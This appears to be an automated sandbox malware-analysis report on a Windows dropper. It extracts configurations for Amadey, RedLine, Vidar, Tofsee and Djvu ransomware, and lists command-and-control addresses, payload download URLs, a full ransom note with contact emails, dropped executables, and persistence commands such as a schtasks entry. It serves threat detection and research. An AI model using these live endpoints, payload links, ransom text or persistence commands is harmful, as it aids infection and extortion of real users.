Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
22-05-2022 07:47
Static task
static1
Behavioral task
behavioral1
Sample
5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe
Resource
win10v2004-20220414-en
General
-
Target
5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe
-
Size
382KB
-
MD5
38b5deb16f9cd877a6a7ca7c7434b5ea
-
SHA1
11051c4a389238fe7e2202cb506a6f23cfa6bfa4
-
SHA256
5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2
-
SHA512
f1f75b2f2641e09c1ce71b7d442b30169b6335d2e15a6fc9bfcb94ffa6552d4f8783cd6468016789d249e2633332e705631e06ad9ede80c03f87e4a051aee899
Malware Config
Extracted
amadey
3.10
185.215.113.38/f8dfksdj3/index.php
Extracted
tofsee
niflheimr.cn
jotunheim.name
Extracted
redline
ruz19489
193.124.22.34:19489
-
auth_value
2b3af4bdf5e7f4f41faf1150d1660073
Extracted
djvu
http://ugll.org/test3/get.php
-
extension
.fefg
-
offline_id
eBNgvyGQV1Hmt9DBdxVRs8qPi1agsS7OaohPmit1
-
payload_url
http://zerit.top/dl/build2.exe
http://ugll.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-j3AdKrnQie Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: admin@helpdata.top Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0482JIjdm
Extracted
vidar
52.1
517
https://t.me/verstappenf1r
https://climatejustice.social/@ronxik312
-
profile_id
517
Extracted
redline
zetka
65.108.27.131:45256
-
auth_value
971cdfac255bca0faee58f58ee853bad
Extracted
vidar
52.2
937
https://t.me/netflixaccsfree
https://mastodon.social/@ronxik12
-
profile_id
937
Signatures
-
Detected Djvu ransomware 7 IoCs
Processes:
resource yara_rule behavioral2/memory/220-220-0x0000000002320000-0x000000000243B000-memory.dmp family_djvu behavioral2/memory/4436-228-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4436-226-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4436-229-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4436-238-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4352-308-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4352-310-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2144 3348 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\Fenix_9.bmp.exe family_redline C:\Users\Admin\Pictures\Adobe Films\Fenix_9.bmp.exe family_redline behavioral2/memory/1580-190-0x00000000000A0000-0x0000000000360000-memory.dmp family_redline behavioral2/memory/2664-217-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/1484-350-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
-
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
-
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
-
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
-
Vidar Stealer 6 IoCs
Processes:
resource yara_rule behavioral2/memory/2060-325-0x0000000000400000-0x000000000044C000-memory.dmp family_vidar behavioral2/memory/2060-324-0x0000000000400000-0x000000000044C000-memory.dmp family_vidar behavioral2/memory/4024-328-0x0000000000930000-0x0000000000979000-memory.dmp family_vidar behavioral2/memory/2060-326-0x0000000000400000-0x000000000044C000-memory.dmp family_vidar behavioral2/memory/4612-352-0x0000000002DE0000-0x0000000002E2E000-memory.dmp family_vidar behavioral2/memory/4612-353-0x0000000000400000-0x0000000002B80000-memory.dmp family_vidar -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 18 IoCs
Processes:
NiceProcessX64.bmp.exeService.bmp.exeSetupMEXX.exe.exeTrdngAnlzr22649.exe.exetest33.bmp.exefxdd.bmp.exeOffscum.exe.exeFenix_9.bmp.exemixinte.bmp.exetest33.bmp.exereal2001.bmp.exeFJEfRXZ.exe.exenorm2.bmp.exerrmix.exe.exe13.php.exepen4ik_v0.7b__windows_64.bmp.exeKrema.bmp.exewam.exe.exepid process 3028 NiceProcessX64.bmp.exe 1392 Service.bmp.exe 376 SetupMEXX.exe.exe 5000 TrdngAnlzr22649.exe.exe 1500 test33.bmp.exe 4936 fxdd.bmp.exe 1824 Offscum.exe.exe 1580 Fenix_9.bmp.exe 460 mixinte.bmp.exe 220 test33.bmp.exe 4612 real2001.bmp.exe 380 FJEfRXZ.exe.exe 776 norm2.bmp.exe 324 rrmix.exe.exe 2084 13.php.exe 228 pen4ik_v0.7b__windows_64.bmp.exe 3388 Krema.bmp.exe 1176 wam.exe.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\Krema.bmp.exe upx C:\Users\Admin\Pictures\Adobe Films\Krema.bmp.exe upx C:\Users\Admin\Pictures\Adobe Films\pen4ik_v0.7b__windows_64.bmp.exe upx C:\Users\Admin\Pictures\Adobe Films\pen4ik_v0.7b__windows_64.bmp.exe upx -
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\norm2.bmp.exe vmprotect C:\Users\Admin\Pictures\Adobe Films\norm2.bmp.exe vmprotect C:\Users\Admin\Pictures\Adobe Films\fxdd.bmp.exe vmprotect C:\Users\Admin\Pictures\Adobe Films\fxdd.bmp.exe vmprotect behavioral2/memory/4936-186-0x0000000000020000-0x00000000008E1000-memory.dmp vmprotect behavioral2/memory/4936-189-0x0000000000020000-0x00000000008E1000-memory.dmp vmprotect C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe vmprotect C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe vmprotect behavioral2/memory/1952-247-0x0000000000580000-0x0000000000E41000-memory.dmp vmprotect -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe13.php.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation 13.php.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
FJEfRXZ.exe.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce FJEfRXZ.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" FJEfRXZ.exe.exe -
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 128 ipinfo.io 191 api.2ip.ua 25 ipinfo.io 26 ipinfo.io 99 ipinfo.io 100 ipinfo.io 109 api.2ip.ua 110 api.2ip.ua -
Drops file in Program Files directory 2 IoCs
Processes:
Service.bmp.exedescription ioc process File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Service.bmp.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Service.bmp.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 22 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1892 460 WerFault.exe mixinte.bmp.exe 3480 776 WerFault.exe norm2.bmp.exe 712 3932 WerFault.exe 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe 3016 460 WerFault.exe mixinte.bmp.exe 2416 2084 WerFault.exe 13.php.exe 1192 460 WerFault.exe mixinte.bmp.exe 3792 460 WerFault.exe mixinte.bmp.exe 3652 204 WerFault.exe xvrjqifn.exe 1772 460 WerFault.exe mixinte.bmp.exe 1084 2520 WerFault.exe mixinte.bmp.exe 628 460 WerFault.exe mixinte.bmp.exe 3796 2520 WerFault.exe mixinte.bmp.exe 1968 436 WerFault.exe rundll32.exe 3288 460 WerFault.exe mixinte.bmp.exe 3496 2520 WerFault.exe mixinte.bmp.exe 1484 324 WerFault.exe rrmix.exe.exe 1820 2520 WerFault.exe mixinte.bmp.exe 4812 460 WerFault.exe mixinte.bmp.exe 3992 376 WerFault.exe SetupMEXX.exe.exe 3540 2520 WerFault.exe mixinte.bmp.exe 2756 460 WerFault.exe mixinte.bmp.exe 5016 2520 WerFault.exe mixinte.bmp.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 980 schtasks.exe 3880 schtasks.exe 2928 schtasks.exe 2256 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 4212 timeout.exe 1144 timeout.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3720 taskkill.exe 3688 taskkill.exe -
Processes:
5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exeNiceProcessX64.bmp.exepid process 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe 3028 NiceProcessX64.bmp.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
WerFault.exewam.exe.exeOffscum.exe.exerrmix.exe.exeSetupMEXX.exe.exedescription pid process Token: SeDebugPrivilege 1580 WerFault.exe Token: SeDebugPrivilege 1176 wam.exe.exe Token: SeDebugPrivilege 1824 Offscum.exe.exe Token: SeDebugPrivilege 324 rrmix.exe.exe Token: SeDebugPrivilege 376 SetupMEXX.exe.exe -
Suspicious use of WriteProcessMemory 61 IoCs
Processes:
5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exeFJEfRXZ.exe.exetest33.bmp.exetest33.bmp.exedescription pid process target process PID 3932 wrote to memory of 3028 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe NiceProcessX64.bmp.exe PID 3932 wrote to memory of 3028 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe NiceProcessX64.bmp.exe PID 3932 wrote to memory of 1392 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe Service.bmp.exe PID 3932 wrote to memory of 1392 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe Service.bmp.exe PID 3932 wrote to memory of 1392 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe Service.bmp.exe PID 3932 wrote to memory of 5000 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe TrdngAnlzr22649.exe.exe PID 3932 wrote to memory of 5000 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe TrdngAnlzr22649.exe.exe PID 3932 wrote to memory of 5000 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe TrdngAnlzr22649.exe.exe PID 3932 wrote to memory of 376 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe SetupMEXX.exe.exe PID 3932 wrote to memory of 376 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe SetupMEXX.exe.exe PID 3932 wrote to memory of 376 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe SetupMEXX.exe.exe PID 3932 wrote to memory of 1500 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe arabcode_crypted_3.bmp.exe PID 3932 wrote to memory of 1500 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe arabcode_crypted_3.bmp.exe PID 3932 wrote to memory of 1500 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe arabcode_crypted_3.bmp.exe PID 3932 wrote to memory of 4936 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe fxdd.bmp.exe PID 3932 wrote to memory of 4936 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe fxdd.bmp.exe PID 3932 wrote to memory of 4936 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe fxdd.bmp.exe PID 3932 wrote to memory of 1824 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe Offscum.exe.exe PID 3932 wrote to memory of 1824 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe Offscum.exe.exe PID 3932 wrote to memory of 1824 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe Offscum.exe.exe PID 3932 wrote to memory of 460 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe mixinte.bmp.exe PID 3932 wrote to memory of 460 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe mixinte.bmp.exe PID 3932 wrote to memory of 460 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe mixinte.bmp.exe PID 3932 wrote to memory of 1580 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe Fenix_9.bmp.exe PID 3932 wrote to memory of 1580 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe Fenix_9.bmp.exe PID 3932 wrote to memory of 1580 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe Fenix_9.bmp.exe PID 3932 wrote to memory of 776 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe norm2.bmp.exe PID 3932 wrote to memory of 776 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe norm2.bmp.exe PID 3932 wrote to memory of 776 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe norm2.bmp.exe PID 3932 wrote to memory of 380 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe FJEfRXZ.exe.exe PID 3932 wrote to memory of 380 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe FJEfRXZ.exe.exe PID 3932 wrote to memory of 380 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe FJEfRXZ.exe.exe PID 3932 wrote to memory of 220 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe test33.bmp.exe PID 3932 wrote to memory of 220 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe test33.bmp.exe PID 3932 wrote to memory of 220 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe test33.bmp.exe PID 3932 wrote to memory of 324 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe rrmix.exe.exe PID 3932 wrote to memory of 324 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe rrmix.exe.exe PID 3932 wrote to memory of 324 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe rrmix.exe.exe PID 3932 wrote to memory of 4612 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe real2001.bmp.exe PID 3932 wrote to memory of 4612 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe real2001.bmp.exe PID 3932 wrote to memory of 4612 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe real2001.bmp.exe PID 3932 wrote to memory of 228 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe pen4ik_v0.7b__windows_64.bmp.exe PID 3932 wrote to memory of 228 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe pen4ik_v0.7b__windows_64.bmp.exe PID 3932 wrote to memory of 2084 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe 13.php.exe PID 3932 wrote to memory of 2084 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe 13.php.exe PID 3932 wrote to memory of 2084 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe 13.php.exe PID 3932 wrote to memory of 3388 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe Krema.bmp.exe PID 3932 wrote to memory of 3388 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe Krema.bmp.exe PID 3932 wrote to memory of 1176 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe wam.exe.exe PID 3932 wrote to memory of 1176 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe wam.exe.exe PID 3932 wrote to memory of 1176 3932 5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe wam.exe.exe PID 380 wrote to memory of 396 380 FJEfRXZ.exe.exe ftp.exe PID 380 wrote to memory of 396 380 FJEfRXZ.exe.exe ftp.exe PID 380 wrote to memory of 396 380 FJEfRXZ.exe.exe ftp.exe PID 1500 wrote to memory of 2664 1500 test33.bmp.exe AppLaunch.exe PID 1500 wrote to memory of 2664 1500 test33.bmp.exe AppLaunch.exe PID 1500 wrote to memory of 2664 1500 test33.bmp.exe AppLaunch.exe PID 1500 wrote to memory of 2664 1500 test33.bmp.exe AppLaunch.exe PID 220 wrote to memory of 4436 220 test33.bmp.exe test33.bmp.exe PID 220 wrote to memory of 4436 220 test33.bmp.exe test33.bmp.exe PID 220 wrote to memory of 4436 220 test33.bmp.exe test33.bmp.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe"C:\Users\Admin\AppData\Local\Temp\5b92d1d8c1df0cc42591bc05cb62331a28f54e3566c708a8fd13b00cb76881c2.exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\Service.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\Service.bmp.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\soNus2fDmB7rss3i9TWV0ToN.exe"C:\Users\Admin\Documents\soNus2fDmB7rss3i9TWV0ToN.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\utube2005.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\utube2005.bmp.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS360F.tmp\Install.exe.\Install.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS5128.tmp\Install.exe.\Install.exe /S /site_id "525403"6⤵
-
